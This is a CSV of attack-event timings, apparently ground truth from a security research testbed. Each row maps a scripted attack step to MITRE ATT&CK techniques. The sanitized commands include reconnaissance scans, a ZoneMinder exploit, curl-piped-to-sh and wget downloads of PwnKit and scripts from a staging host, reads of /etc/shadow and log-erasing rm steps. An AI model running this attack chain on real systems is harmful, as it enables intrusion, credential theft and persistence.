attack-manifestations-interpretation/attack_times.csv at main · ait-aecid/attack-manifestations-interpretation · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
scenario;tactics;techniques;technique_names;event_id;cmd;start;end
1_autostart_localaccount;reconnaissancereconnaissance;T1590.002_T1591;NA;1;dnsenum__f__usr_local_share_SecLists_Discovery_DNS_subdomains_top1million_5000_txt___dnsserver_192_42_0_233_attackbed_com;1758565786.382738;1758565796.0
1_autostart_localaccount;reconnaissancereconnaissance;T1595_T1592.002;NA;2;nmap__O__sT___top_ports_100_video_attackbed_com;1758565805.591219;1758565824.0
1_autostart_localaccount;reconnaissance;T1595.002;NA;3;nikto__host_video_attackbed_com;1758565833.690128;1758565884.0
1_autostart_localaccount;reconnaissance;T1595.003;NA;4;ffuf__w__usr_local_share_SecLists_Discovery_Web_Content_raft_small_directories_lowercase_txt__u_http___video_attackbed_com_FUZZ;1758565893.536828;1758565995.0
1_autostart_localaccount;initial-accessexecution;T1190_T1059.006;NA;5;exploit_unix_webapp_zoneminder_snapshots;1758566004.202763;1758566059.0
1_autostart_localaccount;command-and-control;T1105;NA;6;upload__var_www_html_linpeas_sh;1758566084.766805;1758566092.0
1_autostart_localaccount;execution;T1059;NA;7;python3__c__import_pty_pty_spawn___bash_____;1758566117.470688;1758566124.0
1_autostart_localaccount;execution;T1059;NA;8;export_SHELL_bash;1758566133.832817;1758566141.0
1_autostart_localaccount;execution;T1059;NA;9;export_TERM_xterm256_color;1758566150.072078;1758566157.0
1_autostart_localaccount;execution;T1059;NA;10;stty_rows_38_columns_116;1758566166.437241;1758566173.0
1_autostart_localaccount;execution;T1059;NA;11;export_PS1__PWN__;1758566182.653712;1758566189.0
1_autostart_localaccount;execution;T1059;NA;12;chmod__x_linpeas_sh;1758566198.978441;1758566206.0
1_autostart_localaccount;discoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscovery;T1087_T1083_T1201_T1069_T1057_T1518_T1082_T1614_T1016_T1049_T1033_T1007_T1615;NA;13;__linpeas_sh__s__q__N_2___dev_null;1758566215.198549;1758566822.0
1_autostart_localaccount;discovery;T1033;NA;14;id;1758566831.588726;1758566837.0
1_autostart_localaccount;persistence_privilege-escalation;T1547;NA;15;ExecStartPre_bash__var_www_default__zm_preload_sh__;1758566846.377409;1758566935.0
1_autostart_localaccount;persistence_privilege-escalation;T1547;NA;16;_wq__;1758566961.137429;1758567241.0
1_autostart_localaccount;execution;T1059;NA;17;python3__c__import_pty_pty_spawn___bash_____;1758567277.301695;1758567284.0
1_autostart_localaccount;execution;T1059;NA;18;export_SHELL_bash;1758567293.664227;1758567301.0
1_autostart_localaccount;execution;T1059;NA;19;export_TERM_xterm256_color;1758567310.026968;1758567317.0
1_autostart_localaccount;discovery;T1033;NA;20;id;1758567342.719818;1758567350.0
1_autostart_localaccount;command-and-controlpersistence;T1105_T1136.001;NA;21;curl_http___192_42_1_174_README_txt_3___sh;1758567359.049038;1758567406.0
1_autostart_localaccount;discovery;T1033;NA;22;id;1758567415.427142;1758567451.0
1_autostart_localaccount;discovery;T1033;NA;23;id;1758567493.412428;1758567500.0
1_autostart_localaccount;credential-access;T1003.008;NA;24;cat__etc_shadow;1758567524.027074;1758567530.0
1_autostart_localaccount;discovery;T1120;NA;25;lspci;1758567539.062841;1758567545.0
1_autostart_localaccount;discovery;T1120;NA;26;command__v_lsusb;1758567554.114909;1758567560.0
1_autostart_localaccount;discovery;T1124;NA;27;date;1758567569.150533;1758567575.0
1_autostart_localaccount;defense-evasion_discovery;T1497.001;NA;28;find__usr__name___virtualbox__;1758567584.165877;1758567621.0
1_autostart_pam;reconnaissancereconnaissance;T1590.002_T1591;NA;1;dnsenum__f__usr_local_share_SecLists_Discovery_DNS_subdomains_top1million_5000_txt___dnsserver_192_42_0_233_attackbed_com;1760439542.218696;1760439553.0
1_autostart_pam;reconnaissancereconnaissance;T1595_T1592.002;NA;2;nmap__O__sT___top_ports_100_video_attackbed_com;1760439562.193735;1760439581.0
1_autostart_pam;reconnaissance;T1595.002;NA;3;nikto__host_video_attackbed_com;1760439590.361274;1760439641.0
1_autostart_pam;reconnaissance;T1595.003;NA;4;ffuf__w__usr_local_share_SecLists_Discovery_Web_Content_raft_small_directories_lowercase_txt__u_http___video_attackbed_com_FUZZ;1760439650.045543;1760439757.0
1_autostart_pam;initial-accessexecution;T1190_T1059.006;NA;5;exploit_unix_webapp_zoneminder_snapshots;1760439767.012362;1760439824.0
1_autostart_pam;command-and-control;T1105;NA;6;upload__var_www_html_linpeas_sh;1760439849.797714;1760439857.0
1_autostart_pam;execution;T1059;NA;7;python3__c__import_pty_pty_spawn___bash_____;1760439882.528908;1760439889.0
1_autostart_pam;execution;T1059;NA;8;export_SHELL_bash;1760439898.894251;1760439906.0
1_autostart_pam;execution;T1059;NA;9;export_TERM_xterm256_color;1760439915.263798;1760439922.0
1_autostart_pam;execution;T1059;NA;10;stty_rows_38_columns_116;1760439931.584869;1760439938.0
1_autostart_pam;execution;T1059;NA;11;export_PS1__PWN__;1760439947.913433;1760439955.0
1_autostart_pam;execution;T1059;NA;12;chmod__x_linpeas_sh;1760439964.235829;1760439971.0
1_autostart_pam;discoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscovery;T1087_T1083_T1201_T1069_T1057_T1518_T1082_T1614_T1016_T1049_T1033_T1007_T1615;NA;13;__linpeas_sh__s__q__N_2___dev_null;1760439980.600887;1760440587.0
1_autostart_pam;discovery;T1033;NA;14;id;1760440596.827676;1760440603.0
1_autostart_pam;persistence_privilege-escalation;T1547;NA;15;ExecStartPre_bash__var_www_default__zm_preload_sh__;1760440611.814637;1760440701.0
1_autostart_pam;persistence_privilege-escalation;T1547;NA;16;_wq__;1760440726.400059;1760441006.0
1_autostart_pam;execution;T1059;NA;17;python3__c__import_pty_pty_spawn___bash_____;1760441046.895463;1760441054.0
1_autostart_pam;execution;T1059;NA;18;export_SHELL_bash;1760441063.257378;1760441070.0
1_autostart_pam;execution;T1059;NA;19;export_TERM_xterm256_color;1760441079.623306;1760441086.0
1_autostart_pam;discovery;T1033;NA;20;id;1760441112.347356;1760441119.0
1_autostart_pam;command-and-controlcredential-access_defense-evasion_persistence;T1105_T1556.003;NA;29;curl_http___192_42_1_174_README_txt_5___sh;1760441128.663199;1760441175.0
1_autostart_pam;discovery;T1033;NA;22;id;1760441184.886474;1760441221.0
1_autostart_pam;discovery;T1033;NA;23;id;1760441262.858557;1760441269.0
1_autostart_pam;credential-access;T1003.008;NA;24;cat__etc_shadow;1760441293.191898;1760441299.0
1_autostart_pam;discovery;T1120;NA;25;lspci;1760441308.225298;1760441314.0
1_autostart_pam;discovery;T1120;NA;26;command__v_lsusb;1760441323.301141;1760441329.0
1_autostart_pam;discovery;T1124;NA;27;date;1760441338.336422;1760441344.0
1_autostart_pam;defense-evasion_discovery;T1497.001;NA;28;find__usr__name___virtualbox__;1760441353.355944;1760441390.0
1_autostart_sshkey;reconnaissancereconnaissance;T1590.002_T1591;NA;1;dnsenum__f__usr_local_share_SecLists_Discovery_DNS_subdomains_top1million_5000_txt___dnsserver_192_42_0_233_attackbed_com;1758558515.47398;1758558525.0
1_autostart_sshkey;reconnaissancereconnaissance;T1595_T1592.002;NA;2;nmap__O__sT___top_ports_100_video_attackbed_com;1758558534.083458;1758558553.0
1_autostart_sshkey;reconnaissance;T1595.002;NA;3;nikto__host_video_attackbed_com;1758558562.191877;1758558612.0
1_autostart_sshkey;reconnaissance;T1595.003;NA;4;ffuf__w__usr_local_share_SecLists_Discovery_Web_Content_raft_small_directories_lowercase_txt__u_http___video_attackbed_com_FUZZ;1758558621.334618;1758558722.0
1_autostart_sshkey;initial-accessexecution;T1190_T1059.006;NA;5;exploit_unix_webapp_zoneminder_snapshots;1758558731.856775;1758558790.0
1_autostart_sshkey;command-and-control;T1105;NA;6;upload__var_www_html_linpeas_sh;1758558816.564336;1758558823.0
1_autostart_sshkey;execution;T1059;NA;7;python3__c__import_pty_pty_spawn___bash_____;1758558849.220688;1758558856.0
1_autostart_sshkey;execution;T1059;NA;8;export_SHELL_bash;1758558865.593958;1758558872.0
1_autostart_sshkey;execution;T1059;NA;9;export_TERM_xterm256_color;1758558881.927972;1758558889.0
1_autostart_sshkey;execution;T1059;NA;10;stty_rows_38_columns_116;1758558898.305928;1758558905.0
1_autostart_sshkey;execution;T1059;NA;11;export_PS1__PWN__;1758558914.631138;1758558922.0
1_autostart_sshkey;execution;T1059;NA;12;chmod__x_linpeas_sh;1758558931.019452;1758558938.0
1_autostart_sshkey;discoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscovery;T1087_T1083_T1201_T1069_T1057_T1518_T1082_T1614_T1016_T1049_T1033_T1007_T1615;NA;13;__linpeas_sh__s__q__N_2___dev_null;1758558947.343927;1758559554.0
1_autostart_sshkey;discovery;T1033;NA;14;id;1758559563.676818;1758559569.0
1_autostart_sshkey;persistence_privilege-escalation;T1547;NA;15;ExecStartPre_bash__var_www_default__zm_preload_sh__;1758559578.337478;1758559667.0
1_autostart_sshkey;persistence_privilege-escalation;T1547;NA;16;_wq__;1758559692.991807;1758559973.0
1_autostart_sshkey;execution;T1059;NA;17;python3__c__import_pty_pty_spawn___bash_____;1758560012.031794;1758560019.0
1_autostart_sshkey;execution;T1059;NA;18;export_SHELL_bash;1758560028.354539;1758560035.0
1_autostart_sshkey;execution;T1059;NA;19;export_TERM_xterm256_color;1758560044.720304;1758560052.0
1_autostart_sshkey;discovery;T1033;NA;20;id;1758560077.291825;1758560084.0
1_autostart_sshkey;command-and-controlpersistence_privilege-escalation;T1105_T1098.004;NA;30;curl_http___192_42_1_174_README_txt_1___sh;1758560093.623758;1758560140.0
1_autostart_sshkey;discovery;T1033;NA;22;id;1758560149.859397;1758560186.0
1_autostart_sshkey;discovery;T1033;NA;23;id;1758560227.815632;1758560234.0
1_autostart_sshkey;credential-access;T1003.008;NA;24;cat__etc_shadow;1758560258.441132;1758560264.0
1_autostart_sshkey;discovery;T1120;NA;25;lspci;1758560273.466573;1758560279.0
1_autostart_sshkey;discovery;T1120;NA;26;command__v_lsusb;1758560288.505728;1758560294.0
1_autostart_sshkey;discovery;T1124;NA;27;date;1758560303.527048;1758560309.0
1_autostart_sshkey;defense-evasion_discovery;T1497.001;NA;28;find__usr__name___virtualbox__;1758560318.546037;1758560355.0
1_cron_localaccount;reconnaissancereconnaissance;T1590.002_T1591;NA;1;dnsenum__f__usr_local_share_SecLists_Discovery_DNS_subdomains_top1million_5000_txt___dnsserver_192_42_0_233_attackbed_com;1758700071.088648;1758700080.0
1_cron_localaccount;reconnaissancereconnaissance;T1595_T1592.002;NA;2;nmap__O__sT___top_ports_100_video_attackbed_com;1758700089.943382;1758700109.0
1_cron_localaccount;reconnaissance;T1595.002;NA;3;nikto__host_video_attackbed_com;1758700118.067485;1758700167.0
1_cron_localaccount;reconnaissance;T1595.003;NA;4;ffuf__w__usr_local_share_SecLists_Discovery_Web_Content_raft_small_directories_lowercase_txt__u_http___video_attackbed_com_FUZZ;1758700176.350609;1758700278.0
1_cron_localaccount;initial-accessexecution;T1190_T1059.006;NA;5;exploit_unix_webapp_zoneminder_snapshots;1758700287.739511;1758700340.0
1_cron_localaccount;command-and-control;T1105;NA;6;upload__var_www_html_linpeas_sh;1758700365.901191;1758700373.0
1_cron_localaccount;execution;T1059;NA;7;python3__c__import_pty_pty_spawn___bash_____;1758700398.6523;1758700406.0
1_cron_localaccount;execution;T1059;NA;8;export_SHELL_bash;1758700415.028234;1758700422.0
1_cron_localaccount;execution;T1059;NA;9;export_TERM_xterm256_color;1758700431.340381;1758700438.0
1_cron_localaccount;execution;T1059;NA;10;stty_rows_38_columns_116;1758700447.67948;1758700454.0
1_cron_localaccount;execution;T1059;NA;11;export_PS1__PWN__;1758700463.954617;1758700471.0
1_cron_localaccount;execution;T1059;NA;12;chmod__x_linpeas_sh;1758700480.313524;1758700487.0
1_cron_localaccount;discoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscovery;T1087_T1083_T1201_T1069_T1057_T1518_T1082_T1614_T1016_T1049_T1033_T1007_T1615;NA;13;__linpeas_sh__s__q__N_2___dev_null;1758700496.593532;1758701103.0
1_cron_localaccount;discovery;T1033;NA;14;id;1758701112.968285;1758701119.0
1_cron_localaccount;execution_persistence_privilege-escalation;T1053;NA;31;curl_http___192_42_1_174_TODO_md___sh;1758701177.200166;1758701184.0
1_cron_localaccount;execution_persistence_privilege-escalation;T1053;NA;32;_wq__;1758701209.948255;1758701765.0
1_cron_localaccount;execution;T1059;NA;17;python3__c__import_pty_pty_spawn___bash_____;1758701777.714727;1758701785.0
1_cron_localaccount;execution;T1059;NA;18;export_SHELL_bash;1758701794.07346;1758701801.0
1_cron_localaccount;execution;T1059;NA;19;export_TERM_xterm256_color;1758701810.37921;1758701817.0
1_cron_localaccount;execution;T1059;NA;33;stty_rows_38_columns_116;1758701826.607743;1758701833.0
1_cron_localaccount;discovery;T1033;NA;20;id;1758701842.877328;1758701850.0
1_cron_localaccount;command-and-controlpersistence;T1105_T1136.001;NA;21;curl_http___192_42_1_174_README_txt_3___sh;1758701859.246357;1758701906.0
1_cron_localaccount;discovery;T1033;NA;22;id;1758701915.603331;1758701921.0
1_cron_localaccount;defense-evasion;T1070.004;NA;34;rm;1758701930.886304;1758701968.0
1_cron_localaccount;discovery;T1033;NA;23;id;1758702009.720115;1758702016.0
1_cron_localaccount;credential-access;T1003.008;NA;24;cat__etc_shadow;1758702040.330566;1758702046.0
1_cron_localaccount;discovery;T1120;NA;25;lspci;1758702055.360967;1758702061.0
1_cron_localaccount;discovery;T1120;NA;26;command__v_lsusb;1758702070.406403;1758702076.0
1_cron_localaccount;discovery;T1124;NA;27;date;1758702085.431643;1758702091.0
1_cron_localaccount;defense-evasion_discovery;T1497.001;NA;28;find__usr__name___virtualbox__;1758702100.45333;1758702136.0
1_cron_pam;reconnaissancereconnaissance;T1590.002_T1591;NA;1;dnsenum__f__usr_local_share_SecLists_Discovery_DNS_subdomains_top1million_5000_txt___dnsserver_192_42_0_233_attackbed_com;1758704429.296482;1758704439.0
1_cron_pam;reconnaissancereconnaissance;T1595_T1592.002;NA;2;nmap__O__sT___top_ports_100_video_attackbed_com;1758704448.14373;1758704467.0
1_cron_pam;reconnaissance;T1595.002;NA;3;nikto__host_video_attackbed_com;1758704476.231927;1758704525.0
1_cron_pam;reconnaissance;T1595.003;NA;4;ffuf__w__usr_local_share_SecLists_Discovery_Web_Content_raft_small_directories_lowercase_txt__u_http___video_attackbed_com_FUZZ;1758704534.695572;1758704636.0
1_cron_pam;initial-accessexecution;T1190_T1059.006;NA;5;exploit_unix_webapp_zoneminder_snapshots;1758704645.803675;1758704698.0
1_cron_pam;command-and-control;T1105;NA;6;upload__var_www_html_linpeas_sh;1758704724.333426;1758704731.0
1_cron_pam;execution;T1059;NA;7;python3__c__import_pty_pty_spawn___bash_____;1758704757.066103;1758704764.0
1_cron_pam;execution;T1059;NA;8;export_SHELL_bash;1758704773.42067;1758704780.0
1_cron_pam;execution;T1059;NA;9;export_TERM_xterm256_color;1758704789.733476;1758704797.0
1_cron_pam;execution;T1059;NA;10;stty_rows_38_columns_116;1758704806.098233;1758704813.0
1_cron_pam;execution;T1059;NA;11;export_PS1__PWN__;1758704822.460289;1758704829.0
1_cron_pam;execution;T1059;NA;12;chmod__x_linpeas_sh;1758704838.78171;1758704846.0
1_cron_pam;discoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscovery;T1087_T1083_T1201_T1069_T1057_T1518_T1082_T1614_T1016_T1049_T1033_T1007_T1615;NA;13;__linpeas_sh__s__q__N_2___dev_null;1758704855.151505;1758705462.0
1_cron_pam;discovery;T1033;NA;14;id;1758705471.447914;1758705477.0
1_cron_pam;execution_persistence_privilege-escalation;T1053;NA;31;curl_http___192_42_1_174_TODO_md___sh;1758705535.665903;1758705542.0
1_cron_pam;execution_persistence_privilege-escalation;T1053;NA;32;_wq__;1758705568.283557;1758706270.0
1_cron_pam;execution;T1059;NA;17;python3__c__import_pty_pty_spawn___bash_____;1758706277.965469;1758706285.0
1_cron_pam;execution;T1059;NA;18;export_SHELL_bash;1758706294.316403;1758706301.0
1_cron_pam;execution;T1059;NA;19;export_TERM_xterm256_color;1758706310.677588;1758706318.0
1_cron_pam;execution;T1059;NA;33;stty_rows_38_columns_116;1758706327.050865;1758706334.0
1_cron_pam;discovery;T1033;NA;20;id;1758706343.411938;1758706350.0
1_cron_pam;command-and-controlcredential-access_defense-evasion_persistence;T1105_T1556.003;NA;29;curl_http___192_42_1_174_README_txt_5___sh;1758706359.63053;1758706406.0
1_cron_pam;discovery;T1033;NA;22;id;1758706415.99591;1758706422.0
1_cron_pam;defense-evasion;T1070.004;NA;34;rm;1758706431.26469;1758706468.0
1_cron_pam;discovery;T1033;NA;23;id;1758706510.347509;1758706516.0
1_cron_pam;credential-access;T1003.008;NA;24;cat__etc_shadow;1758706540.603852;1758706546.0
1_cron_pam;discovery;T1120;NA;25;lspci;1758706555.638642;1758706561.0
1_cron_pam;discovery;T1120;NA;26;command__v_lsusb;1758706570.688956;1758706576.0
1_cron_pam;discovery;T1124;NA;27;date;1758706585.720285;1758706591.0
1_cron_pam;defense-evasion_discovery;T1497.001;NA;28;find__usr__name___virtualbox__;1758706600.738108;1758706636.0
1_cron_sshkey;reconnaissancereconnaissance;T1590.002_T1591;NA;1;dnsenum__f__usr_local_share_SecLists_Discovery_DNS_subdomains_top1million_5000_txt___dnsserver_192_42_0_233_attackbed_com;1758694711.081011;1758694720.0
1_cron_sshkey;reconnaissancereconnaissance;T1595_T1592.002;NA;2;nmap__O__sT___top_ports_100_video_attackbed_com;1758694729.98692;1758694749.0
1_cron_sshkey;reconnaissance;T1595.002;NA;3;nikto__host_video_attackbed_com;1758694758.120949;1758694808.0
1_cron_sshkey;reconnaissance;T1595.003;NA;4;ffuf__w__usr_local_share_SecLists_Discovery_Web_Content_raft_small_directories_lowercase_txt__u_http___video_attackbed_com_FUZZ;1758694817.128538;1758694919.0
1_cron_sshkey;initial-accessexecution;T1190_T1059.006;NA;5;exploit_unix_webapp_zoneminder_snapshots;1758694928.20068;1758694985.0
1_cron_sshkey;command-and-control;T1105;NA;6;upload__var_www_html_linpeas_sh;1758695010.591283;1758695017.0
1_cron_sshkey;execution;T1059;NA;7;python3__c__import_pty_pty_spawn___bash_____;1758695043.199902;1758695050.0
1_cron_sshkey;execution;T1059;NA;8;export_SHELL_bash;1758695059.567678;1758695066.0
1_cron_sshkey;execution;T1059;NA;9;export_TERM_xterm256_color;1758695075.785453;1758695083.0
1_cron_sshkey;execution;T1059;NA;10;stty_rows_38_columns_116;1758695092.156268;1758695099.0
1_cron_sshkey;execution;T1059;NA;11;export_PS1__PWN__;1758695108.518004;1758695115.0
1_cron_sshkey;execution;T1059;NA;12;chmod__x_linpeas_sh;1758695124.864309;1758695132.0
1_cron_sshkey;discoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscovery;T1087_T1083_T1201_T1069_T1057_T1518_T1082_T1614_T1016_T1049_T1033_T1007_T1615;NA;13;__linpeas_sh__s__q__N_2___dev_null;1758695141.228631;1758695748.0
1_cron_sshkey;discovery;T1033;NA;14;id;1758695757.605687;1758695763.0
1_cron_sshkey;execution_persistence_privilege-escalation;T1053;NA;31;curl_http___192_42_1_174_TODO_md___sh;1758695821.874229;1758695829.0
1_cron_sshkey;execution_persistence_privilege-escalation;T1053;NA;32;_wq__;1758695854.466512;1758696365.0
1_cron_sshkey;execution;T1059;NA;17;python3__c__import_pty_pty_spawn___bash_____;1758696376.832543;1758696384.0
1_cron_sshkey;execution;T1059;NA;18;export_SHELL_bash;1758696393.14249;1758696400.0
1_cron_sshkey;execution;T1059;NA;19;export_TERM_xterm256_color;1758696409.508057;1758696416.0
1_cron_sshkey;execution;T1059;NA;33;stty_rows_38_columns_116;1758696425.691962;1758696433.0
1_cron_sshkey;discovery;T1033;NA;20;id;1758696442.061722;1758696449.0
1_cron_sshkey;command-and-controlpersistence_privilege-escalation;T1105_T1098.004;NA;30;curl_http___192_42_1_174_README_txt_1___sh;1758696458.295256;1758696505.0
1_cron_sshkey;discovery;T1033;NA;22;id;1758696514.656273;1758696520.0
1_cron_sshkey;defense-evasion;T1070.004;NA;34;rm;1758696529.926793;1758696567.0
1_cron_sshkey;discovery;T1033;NA;23;id;1758696608.875684;1758696615.0
1_cron_sshkey;credential-access;T1003.008;NA;24;cat__etc_shadow;1758696639.476925;1758696645.0
1_cron_sshkey;discovery;T1120;NA;25;lspci;1758696654.488588;1758696660.0
1_cron_sshkey;discovery;T1120;NA;26;command__v_lsusb;1758696669.535761;1758696675.0
1_cron_sshkey;discovery;T1124;NA;27;date;1758696684.55363;1758696690.0
1_cron_sshkey;defense-evasion_discovery;T1497.001;NA;28;find__usr__name___virtualbox__;1758696699.570745;1758696735.0
1_pwnkit_localaccount;reconnaissancereconnaissance;T1590.002_T1591;NA;1;dnsenum__f__usr_local_share_SecLists_Discovery_DNS_subdomains_top1million_5000_txt___dnsserver_192_42_0_233_attackbed_com;1758522316.316672;1758522327.0
1_pwnkit_localaccount;reconnaissancereconnaissance;T1595_T1592.002;NA;2;nmap__O__sT___top_ports_100_video_attackbed_com;1758522336.167729;1758522355.0
1_pwnkit_localaccount;reconnaissance;T1595.002;NA;3;nikto__host_video_attackbed_com;1758522364.28209;1758522414.0
1_pwnkit_localaccount;reconnaissance;T1595.003;NA;4;ffuf__w__usr_local_share_SecLists_Discovery_Web_Content_raft_small_directories_lowercase_txt__u_http___video_attackbed_com_FUZZ;1758522423.635242;1758522525.0
1_pwnkit_localaccount;initial-accessexecution;T1190_T1059.006;NA;5;exploit_unix_webapp_zoneminder_snapshots;1758522534.922878;1758522586.0
1_pwnkit_localaccount;command-and-control;T1105;NA;6;upload__var_www_html_linpeas_sh;1758522611.979386;1758522619.0
1_pwnkit_localaccount;execution;T1059;NA;7;python3__c__import_pty_pty_spawn___bash_____;1758522644.620207;1758522651.0
1_pwnkit_localaccount;execution;T1059;NA;8;export_SHELL_bash;1758522660.936172;1758522668.0
1_pwnkit_localaccount;execution;T1059;NA;9;export_TERM_xterm256_color;1758522677.295627;1758522684.0
1_pwnkit_localaccount;execution;T1059;NA;10;stty_rows_38_columns_116;1758522693.527068;1758522700.0
1_pwnkit_localaccount;execution;T1059;NA;11;export_PS1__PWN__;1758522709.892549;1758522717.0
1_pwnkit_localaccount;execution;T1059;NA;12;chmod__x_linpeas_sh;1758522726.168701;1758522733.0
1_pwnkit_localaccount;discoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscovery;T1087_T1083_T1201_T1069_T1057_T1518_T1082_T1614_T1016_T1049_T1033_T1007_T1615;NA;13;__linpeas_sh__s__q__N_2___dev_null;1758522742.540556;1758523348.0
1_pwnkit_localaccount;discovery;T1033;NA;14;id;1758523357.739515;1758523363.0
1_pwnkit_localaccount;command-and-control;T1105;NA;35;wget_http___192_42_1_174_PwnKit____dev_null_2__1;1758523372.982571;1758523380.0
1_pwnkit_localaccount;privilege-escalation;T1068;NA;36;chmod__x_PwnKit______PwnKit;1758523389.352215;1758523396.0
1_pwnkit_localaccount;discovery;T1033;NA;37;id;1758523405.675744;1758523413.0
1_pwnkit_localaccount;command-and-controlpersistence;T1105_T1136.001;NA;38;cd__root__wget__O_README_txt_http___192_42_1_174_README_txt_2;1758523422.042352;1758523429.0
1_pwnkit_localaccount;defense-evasionpersistence;T1218_T1136.001;NA;39;split___filter__cat__FILE___xargs_bash__c____C_2000_README_txt;1758523438.346057;1758523445.0
1_pwnkit_localaccount;defense-evasion;T1070.004;NA;40;rm;1758523454.669295;1758523462.0
1_pwnkit_localaccount;defense-evasion;T1070.004;NA;40;rm;1758523487.322861;1758523494.0
1_pwnkit_localaccount;defense-evasion;T1070.004;NA;40;rm;1758523503.691912;1758523540.0
1_pwnkit_localaccount;discovery;T1033;NA;23;id;1758523566.351938;1758523572.0
1_pwnkit_localaccount;credential-access;T1003.008;NA;24;cat__etc_shadow;1758523596.96158;1758523602.0
1_pwnkit_localaccount;discovery;T1120;NA;25;lspci;1758523611.996878;1758523618.0
1_pwnkit_localaccount;discovery;T1120;NA;26;command__v_lsusb;1758523627.048434;1758523633.0
1_pwnkit_localaccount;discovery;T1124;NA;27;date;1758523642.083046;1758523648.0
1_pwnkit_localaccount;defense-evasion_discovery;T1497.001;NA;28;find__usr__name___virtualbox__;1758523657.098431;1758523693.0
1_pwnkit_pam;reconnaissancereconnaissance;T1590.002_T1591;NA;1;dnsenum__f__usr_local_share_SecLists_Discovery_DNS_subdomains_top1million_5000_txt___dnsserver_192_42_0_233_attackbed_com;1758526963.396871;1758526973.0
1_pwnkit_pam;reconnaissancereconnaissance;T1595_T1592.002;NA;2;nmap__O__sT___top_ports_100_video_attackbed_com;1758526982.181244;1758527001.0
1_pwnkit_pam;reconnaissance;T1595.002;NA;3;nikto__host_video_attackbed_com;1758527010.309994;1758527060.0
1_pwnkit_pam;reconnaissance;T1595.003;NA;4;ffuf__w__usr_local_share_SecLists_Discovery_Web_Content_raft_small_directories_lowercase_txt__u_http___video_attackbed_com_FUZZ;1758527069.971594;1758527171.0
1_pwnkit_pam;initial-accessexecution;T1190_T1059.006;NA;5;exploit_unix_webapp_zoneminder_snapshots;1758527180.887096;1758527234.0
1_pwnkit_pam;command-and-control;T1105;NA;6;upload__var_www_html_linpeas_sh;1758527259.778993;1758527267.0
1_pwnkit_pam;execution;T1059;NA;7;python3__c__import_pty_pty_spawn___bash_____;1758527292.495705;1758527299.0
1_pwnkit_pam;execution;T1059;NA;8;export_SHELL_bash;1758527308.861674;1758527316.0
1_pwnkit_pam;execution;T1059;NA;9;export_TERM_xterm256_color;1758527325.216098;1758527332.0
